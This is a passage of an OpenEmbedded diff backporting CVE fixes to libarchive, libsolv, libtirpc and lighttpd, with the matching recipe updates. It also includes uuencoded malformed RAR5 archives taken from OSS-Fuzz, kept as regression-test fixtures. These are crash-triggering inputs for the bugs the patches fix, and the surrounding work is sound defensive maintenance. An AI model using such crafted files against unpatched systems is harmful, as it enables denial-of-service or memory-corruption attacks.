84@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
85 EPILOGUE();
86 }
87
88+DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
89+{
90+ /* oss fuzz 30442 */
91+
92+ char buf[4096];
93+ PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
94+
95+ /* Return codes of those calls are ignored, because this sample file
96+ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
97+ * errors during processing. */
98+
99+ (void) archive_read_next_header(a, &ae);
100+ while(0 < archive_read_data(a, buf, 46)) {}
101+
102+ EPILOGUE();
103+}
104+
105 DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
106 {
107 char buf[4096];
108--- /dev/null
109+++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
110@@ -0,0 +1,11 @@
111+begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
112+M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
113+M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
114+M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
115+MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
116+M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
117+M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
118+M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
119+J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
120+`
121+end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
new file mode 100644
index 0000000000..0e1549f229
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
1From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
2From: Grzegorz Antoniak <ga@anadoxin.org>
3Date: Sat, 13 Feb 2021 10:13:22 +0100
4Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
5 parameters
6
7Some specially crafted files declare invalid extraction parameters that
8can confuse the RAR5 reader.
9
10One of the arguments is the declared window size parameter that the
11archive file can declare for each file stored in the archive. Some
12crafted files declare window size equal to 0, which is clearly wrong.
13
14This commit adds additional safety checks decreasing the tolerance of
15the RAR5 format.
16
17This commit also contains OSSFuzz sample #30459.
18---
19 Makefile.am | 1 +
20 libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
21 libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++
22 ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++
23 4 files changed, 37 insertions(+)
24 create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
25
26Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
27CVE: CVE-2021-36976
28Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
29
30--- libarchive-3.4.2.orig/Makefile.am
31+++ libarchive-3.4.2/Makefile.am
32@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
33 libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
34 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
35 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
36+ libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
37 libarchive/test/test_read_format_raw.bufr.uu \
38 libarchive/test/test_read_format_raw.data.gz.uu \
39 libarchive/test/test_read_format_raw.data.Z.uu \
40--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
41+++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
42@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
43 rar->cstate.initialized = 1;
44 }
45
46+ /* Don't allow extraction if window_size is invalid. */
47+ if(rar->cstate.window_size == 0) {
48+ archive_set_error(&a->archive,
49+ ARCHIVE_ERRNO_FILE_FORMAT,
50+ "Invalid window size declaration in this file");
51+
52+ /* This should never happen in valid files. */
53+ return ARCHIVE_FATAL;
54+ }
55+
56 if(rar->cstate.all_filters_applied == 1) {
57 /* We use while(1) here, but standard case allows for just 1
58 * iteration. The loop will iterate if process_block() didn't
59--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
60+++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
61@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
62
63 EPILOGUE();
64 }
65+
66+DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
67+{
68+ /* oss fuzz 30459 */
69+
70+ char buf[4096];
71+ PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
72+
73+ /* This file is damaged, so those functions should return failure.
74+ * Additionally, SIGSEGV shouldn't be raised during execution
75+ * of those functions. */
76+
77+ (void) archive_read_next_header(a, &ae);
78+ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
79+ (void) archive_read_next_header(a, &ae);
80+ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
81+
82+ EPILOGUE();
83+}
84--- /dev/null
85+++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
86@@ -0,0 +1,7 @@
87+begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
88+M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
89+M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
90+M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
91+5$"`OX2`@[.SL[.S_("`@("`@("`@
92+`
93+end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
new file mode 100644
index 0000000000..501fcc5848
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
@@ -0,0 +1,29 @@
1From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001
2From: Tim Kientzle <kientzle@acm.org>
3Date: Thu, 24 Mar 2022 10:35:00 +0100
4Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in
5 zipx_lzma_alone_init()
6
7Fixes #1672
8
9CVE: CVE-2022-26280
10Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff]
11Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
12
13---
14 libarchive/archive_read_support_format_zip.c | 2 +-
15 1 file changed, 1 insertion(+), 1 deletion(-)
16
17diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c
18index 38ada70b5..9d6c900b2 100644
19--- a/libarchive/archive_read_support_format_zip.c
20+++ b/libarchive/archive_read_support_format_zip.c
21@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip)
22 */
23
24 /* Read magic1,magic2,lzma_params from the ZIPX stream. */
25- if((p = __archive_read_ahead(a, 9, NULL)) == NULL) {
26+ if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) {
27 archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
28 "Truncated lzma data");
29 return (ARCHIVE_FATAL);
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
new file mode 100644
index 0000000000..980a0e884a
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
@@ -0,0 +1,43 @@
1From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001
2From: obiwac <obiwac@gmail.com>
3Date: Fri, 22 Jul 2022 22:41:10 +0200
4Subject: [PATCH] CVE-2022-36227
5
6libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754)
7
8Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5]
9CVE: CVE-2022-36227
10Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com
11---
12 libarchive/archive_write.c | 8 ++++++++
13 1 file changed, 8 insertions(+)
14
15diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c
16index 98a55fb..7fe88b6 100644
17--- a/libarchive/archive_write.c
18+++ b/libarchive/archive_write.c
19@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a)
20 struct archive_write_filter *f;
21
22 f = calloc(1, sizeof(*f));
23+
24+ if (f == NULL)
25+ return (NULL);
26+
27 f->archive = _a;
28 f->state = ARCHIVE_WRITE_FILTER_STATE_NEW;
29 if (a->filter_first == NULL)
30@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data,
31 a->client_data = client_data;
32
33 client_filter = __archive_write_allocate_filter(_a);
34+
35+ if (client_filter == NULL)
36+ return (ARCHIVE_FATAL);
37+
38 client_filter->open = archive_write_client_open;
39 client_filter->write = archive_write_client_write;
40 client_filter->close = archive_write_client_close;
41--
422.25.1
43
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
index 0ab40fc096..728eedc401 100644
--- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
+++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls,"
32 32
33EXTRA_OECONF += "--enable-largefile" 33EXTRA_OECONF += "--enable-largefile"
34 34
35SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz" 35SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \
36 file://CVE-2021-36976-1.patch \
37 file://CVE-2021-36976-2.patch \
38 file://CVE-2021-36976-3.patch \
39 file://CVE-2021-23177.patch \
40 file://CVE-2021-31566-01.patch \
41 file://CVE-2021-31566-02.patch \
42 file://CVE-2022-26280.patch \
43 file://CVE-2022-36227.patch \
44"
36 45
37SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451" 46SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451"
38SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176" 47SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176"
39 48
49# upstream-wontfix: upstream has documented that reported function is not thread-safe
50CVE_CHECK_WHITELIST += "CVE-2023-30571"
51
40inherit autotools update-alternatives pkgconfig 52inherit autotools update-alternatives pkgconfig
41 53
42CPPFLAGS += "-I${WORKDIR}/extra-includes" 54CPPFLAGS += "-I${WORKDIR}/extra-includes"
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb
index 28c84af7ad..cbb38674b9 100644
--- a/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}"
14 14
15SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" 15SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3"
16 16
17SRC_URI = "git://github.com/thkukuk/libnsl \ 17SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
18 " 18 "
19 19
20S = "${WORKDIR}/git" 20S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb
index a1d914e871..0ec64544be 100644
--- a/meta/recipes-extended/libnss-nis/libnss-nis.bb
+++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
13SECTION = "libs" 13SECTION = "libs"
14DEPENDS += "libtirpc libnsl2" 14DEPENDS += "libtirpc libnsl2"
15 15
16PV = "3.1+git${SRCPV}" 16PV = "3.2"
17 17
18SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" 18SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59"
19 19
20SRC_URI = "git://github.com/thkukuk/libnss_nis \ 20SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \
21 " 21 "
22 22
23S = "${WORKDIR}/git" 23S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
new file mode 100644
index 0000000000..fa577fd533
--- /dev/null
+++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
@@ -0,0 +1,82 @@
1From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001
2From: Michael Schroeder <mls@suse.de>
3Date: Mon, 14 Dec 2020 11:12:00 +0100
4Subject: [PATCH] testcase_read: error out if repos are added or the system is
5 changed too late
6
7We must not add new solvables after the considered map was created, the solver
8was created, or jobs were added. We may not changed the system after jobs have
9been added.
10
11(Jobs may point inside the whatproviedes array, so we must not invalidate this
12area.)
13
14Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec]
15CVE: CVE-2021-3200
16CVE: CVE-2021-33928
17CVE: CVE-2021-33929
18CVE: CVE-2021-33930
19CVE: CVE-2021-33938
20CVE: CVE-2021-44568
21CVE: CVE-2021-44569
22CVE: CVE-2021-44570
23CVE: CVE-2021-44571
24CVE: CVE-2021-44573
25CVE: CVE-2021-44574
26CVE: CVE-2021-44575
27CVE: CVE-2021-44576
28CVE: CVE-2021-44577
29Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
30
31Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
32Signed-off-by: Steve Sakoman <steve@sakoman.com>
33---
34 ext/testcase.c | 21 +++++++++++++++++++++
35 1 file changed, 21 insertions(+)
36
37diff --git a/ext/testcase.c b/ext/testcase.c
38index 0be7a213..8fb6d793 100644
39--- a/ext/testcase.c
40+++ b/ext/testcase.c
41@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
42 Id *genid = 0;
43 int ngenid = 0;
44 Queue autoinstq;
45+ int oldjobsize = job ? job->count : 0;
46
47 if (resultp)
48 *resultp = 0;
49@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
50 int prio, subprio;
51 const char *rdata;
52
53+ if (pool->considered)
54+ {
55+ pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled");
56+ continue;
57+ }
58+ if (solv)
59+ {
60+ pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created");
61+ continue;
62+ }
63+ if (job && job->count != oldjobsize)
64+ {
65+ pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created");
66+ continue;
67+ }
68 prepared = 0;
69 if (!poolflagsreset)
70 {
71@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
72 int i;
73
74 /* must set the disttype before the arch */
75+ if (job && job->count != oldjobsize)
76+ {
77+ pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created");
78+ continue;
79+ }
80 prepared = 0;
81 if (strcmp(pieces[2], "*") != 0)
82 {
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
index 265a27c00d..2c2aedc32c 100644
--- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
+++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Library for solving packages and reading repositories" 1SUMMARY = "Library for solving packages and reading repositories"
2DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories"
2HOMEPAGE = "https://github.com/openSUSE/libsolv" 3HOMEPAGE = "https://github.com/openSUSE/libsolv"
3BUGTRACKER = "https://github.com/openSUSE/libsolv/issues" 4BUGTRACKER = "https://github.com/openSUSE/libsolv/issues"
4SECTION = "devel" 5SECTION = "devel"
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8"
7 8
8DEPENDS = "expat zlib" 9DEPENDS = "expat zlib"
9 10
10SRC_URI = "git://github.com/openSUSE/libsolv.git \ 11SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
12 file://CVE-2021-3200.patch \
11" 13"
12 14
13SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378" 15SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378"
diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
new file mode 100644
index 0000000000..c78e7ef4d5
--- /dev/null
+++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
@@ -0,0 +1,155 @@
1From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 28 Jul 2022 09:11:04 +0530
4Subject: [PATCH] CVE-2021-46828
5
6Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed}
7CVE: CVE-2021-46828
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/svc.c | 17 +++++++++++++-
11 src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++-
12 2 files changed, 77 insertions(+), 2 deletions(-)
13
14diff --git a/src/svc.c b/src/svc.c
15index 6db164b..3a8709f 100644
16--- a/src/svc.c
17+++ b/src/svc.c
18@@ -57,7 +57,7 @@
19
20 #define max(a, b) (a > b ? a : b)
21
22-static SVCXPRT **__svc_xports;
23+SVCXPRT **__svc_xports;
24 int __svc_maxrec;
25
26 /*
27@@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock)
28 rwlock_unlock (&svc_fd_lock);
29 }
30
31+int
32+svc_open_fds()
33+{
34+ int ix;
35+ int nfds = 0;
36+
37+ rwlock_rdlock (&svc_fd_lock);
38+ for (ix = 0; ix < svc_max_pollfd; ++ix) {
39+ if (svc_pollfd[ix].fd != -1)
40+ nfds++;
41+ }
42+ rwlock_unlock (&svc_fd_lock);
43+ return (nfds);
44+}
45+
46 /*
47 * Add a service program to the callout list.
48 * The dispatch routine will be called when a rpc request for this
49diff --git a/src/svc_vc.c b/src/svc_vc.c
50index c23cd36..1729963 100644
51--- a/src/svc_vc.c
52+++ b/src/svc_vc.c
53@@ -64,6 +64,8 @@
54
55
56 extern rwlock_t svc_fd_lock;
57+extern SVCXPRT **__svc_xports;
58+extern int svc_open_fds();
59
60 static SVCXPRT *makefd_xprt(int, u_int, u_int);
61 static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *);
62@@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *);
63 static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in);
64 static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq,
65 void *in);
66+static int __svc_destroy_idle(int timeout);
67
68 struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */
69 u_int sendsize;
70@@ -312,13 +315,14 @@ done:
71 return (xprt);
72 }
73
74+
75 /*ARGSUSED*/
76 static bool_t
77 rendezvous_request(xprt, msg)
78 SVCXPRT *xprt;
79 struct rpc_msg *msg;
80 {
81- int sock, flags;
82+ int sock, flags, nfds, cnt;
83 struct cf_rendezvous *r;
84 struct cf_conn *cd;
85 struct sockaddr_storage addr;
86@@ -378,6 +382,16 @@ again:
87
88 gettimeofday(&cd->last_recv_time, NULL);
89
90+ nfds = svc_open_fds();
91+ if (nfds >= (_rpc_dtablesize() / 5) * 4) {
92+ /* destroy idle connections */
93+ cnt = __svc_destroy_idle(15);
94+ if (cnt == 0) {
95+ /* destroy least active */
96+ __svc_destroy_idle(0);
97+ }
98+ }
99+
100 return (FALSE); /* there is never an rpc msg to be processed */
101 }
102
103@@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock)
104 {
105 return FALSE;
106 }
107+
108+static int
109+__svc_destroy_idle(int timeout)
110+{
111+ int i, ncleaned = 0;
112+ SVCXPRT *xprt, *least_active;
113+ struct timeval tv, tdiff, tmax;
114+ struct cf_conn *cd;
115+
116+ gettimeofday(&tv, NULL);
117+ tmax.tv_sec = tmax.tv_usec = 0;
118+ least_active = NULL;
119+ rwlock_wrlock(&svc_fd_lock);
120+
121+ for (i = 0; i <= svc_max_pollfd; i++) {
122+ if (svc_pollfd[i].fd == -1)
123+ continue;
124+ xprt = __svc_xports[i];
125+ if (xprt == NULL || xprt->xp_ops == NULL ||
126+ xprt->xp_ops->xp_recv != svc_vc_recv)
127+ continue;
128+ cd = (struct cf_conn *)xprt->xp_p1;
129+ if (!cd->nonblock)
130+ continue;
131+ if (timeout == 0) {
132+ timersub(&tv, &cd->last_recv_time, &tdiff);
133+ if (timercmp(&tdiff, &tmax, >)) {
134+ tmax = tdiff;
135+ least_active = xprt;
136+ }
137+ continue;
138+ }
139+ if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) {
140+ __xprt_unregister_unlocked(xprt);
141+ __svc_vc_dodestroy(xprt);
142+ ncleaned++;
143+ }
144+ }
145+ if (timeout == 0 && least_active != NULL) {
146+ __xprt_unregister_unlocked(least_active);
147+ __svc_vc_dodestroy(least_active);
148+ ncleaned++;
149+ }
150+ rwlock_unlock(&svc_fd_lock);
151+ return (ncleaned);
152+}
153--
1542.25.1
155
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
index 10a324c3b6..80151ff83a 100644
--- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
+++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \
9 9
10PROVIDES = "virtual/librpc" 10PROVIDES = "virtual/librpc"
11 11
12SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2" 12SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \
13 file://CVE-2021-46828.patch \
14 "
13UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/" 15UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/"
14UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/" 16UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/"
15SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb" 17SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb"
@@ -20,7 +22,7 @@ inherit autotools pkgconfig
20EXTRA_OECONF = "--disable-gssapi" 22EXTRA_OECONF = "--disable-gssapi"
21 23
22do_install_append() { 24do_install_append() {
23 chown root:root ${D}${sysconfdir}/netconfig 25 test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig
24} 26}
25 27
26BBCLASSEXTEND = "native nativesdk" 28BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
index f17bdce2c0..44b9136b05 100644
--- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
@@ -1,4 +1,4 @@
1From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 1From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com> 2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Fri, 26 Aug 2016 18:20:32 +0300 3Date: Fri, 26 Aug 2016 18:20:32 +0300
4Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. 4Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
6RP 2014/5/22 6RP 2014/5/22
7Upstream-Status: Pending 7Upstream-Status: Pending
8Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> 8Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
9
9--- 10---
10 configure.ac | 16 ++++++++++++---- 11 configure.ac | 16 ++++++++++++----
11 1 file changed, 12 insertions(+), 4 deletions(-) 12 1 file changed, 12 insertions(+), 4 deletions(-)
12 13
13diff --git a/configure.ac b/configure.ac 14diff --git a/configure.ac b/configure.ac
14index 5383cec..c29a902 100644 15index dbddfb9..62cf17f 100644
15--- a/configure.ac 16--- a/configure.ac
16+++ b/configure.ac 17+++ b/configure.ac
17@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], 18@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre],
18 ) 19 )
19 AC_MSG_RESULT([$WITH_PCRE]) 20 AC_MSG_RESULT([$WITH_PCRE])
20 21
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644
37 else 38 else
38 AC_PATH_PROG([PCRECONFIG], [pcre-config]) 39 AC_PATH_PROG([PCRECONFIG], [pcre-config])
39 if test -n "$PCRECONFIG"; then 40 if test -n "$PCRECONFIG"; then
40--
412.15.0
42
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
new file mode 100644
index 0000000000..e226366112
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
@@ -0,0 +1,224 @@
1From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001
2From: Glenn Strauss <gstrauss@gluelogic.com>
3Date: Wed, 23 Dec 2020 23:14:47 -0500
4Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033)
5
6(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337)
7
8(thx flynn)
9
10fix large memory usage for large file downloads from dynamic backends
11
12reuse or release large memory chunks
13
14x-ref:
15 "Memory Growth with PUT and full buffered streams"
16 https://redmine.lighttpd.net/issues/3033
17
18Upstream-Status: Backport
19Comment: Hunk refreshed to make it backword compatible.
20https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
21Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
22
23---
24 src/chunk.c | 99 +++++++++++++++++++++++++++++++++---------
25 src/chunk.h | 2 +
26 src/http-header-glue.c | 2 +-
27 3 files changed, 82 insertions(+), 21 deletions(-)
28
29diff --git a/src/chunk.c b/src/chunk.c
30index 133308f..d7259b9 100644
31--- a/src/chunk.c
32+++ b/src/chunk.c
33@@ -28,16 +28,20 @@
34 static size_t chunk_buf_sz = 8192;
35 static chunk *chunks, *chunks_oversized;
36 static chunk *chunk_buffers;
37+static int chunks_oversized_n;
38 static array *chunkqueue_default_tempdirs = NULL;
39 static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
40
41 void chunkqueue_set_chunk_size (size_t sz)
42 {
43- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
44+ size_t x = 1024;
45+ while (x < sz && x < (1u << 30)) x <<= 1;
46+ chunk_buf_sz = sz > 0 ? x : 8192;
47 }
48
49 void chunkqueue_set_tempdirs_default_reset (void)
50 {
51+ chunk_buf_sz = 8192;
52 chunkqueue_default_tempdirs = NULL;
53 chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
54 }
55@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) {
56 free(c);
57 }
58
59-buffer * chunk_buffer_acquire(void) {
60+static chunk * chunk_pop_oversized(size_t sz) {
61+ /* future: might have buckets of certain sizes, up to socket buf sizes */
62+ if (chunks_oversized && chunks_oversized->mem->size >= sz) {
63+ --chunks_oversized_n;
64+ chunk *c = chunks_oversized;
65+ chunks_oversized = c->next;
66+ return c;
67+ }
68+ return NULL;
69+}
70+
71+static void chunk_push_oversized(chunk * const c, const size_t sz) {
72+ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) {
